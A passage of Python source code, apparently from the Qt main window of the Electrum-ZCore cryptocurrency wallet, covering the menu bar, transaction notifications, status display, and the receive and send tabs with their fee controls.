self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
if self.wallet.has_lightning():
tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog)
tools_menu.addAction(_("&Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://zcore.cash"))
help_menu.addSeparator()
help_menu.addAction(_("&Support"), lambda: webopen("https://central.zcore.cash/support")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('zcore:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-ZCore",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Electrum-ZCore's icon from oimo at askmona.") + "\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-ZCore - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-ZCore", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-ZCore", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
#self.channels_list = ChannelsList(self)
#t = self.channels_list.get_toolbar()
#return self.create_list_tab(self.channels_list, t)
return
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Request'))
self.create_invoice_button.setIcon(read_QIcon("zcore.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments (right click on the line to menu)'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
self.receive_widgets = QTabWidget()
self.receive_widgets.addTab(self.receive_qr, 'QR Code')
self.receive_widgets.addTab(self.receive_address_e, 'Text')
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(self.receive_widgets)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
self.show_message(_(f"{title} copied to clipboard:\n\n{content}"))
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_masternode_tab(self):
from .masternode_tab import MasternodeTab
self.masternode_tab = masternode_tab = MasternodeTab(self)
return masternode_tab
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
self.feecontrol_fields = QWidget()
vbox_feecontrol = QVBoxLayout(self.feecontrol_fields)
vbox_feecontrol.setContentsMargins(0, 0, 0, 0)
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
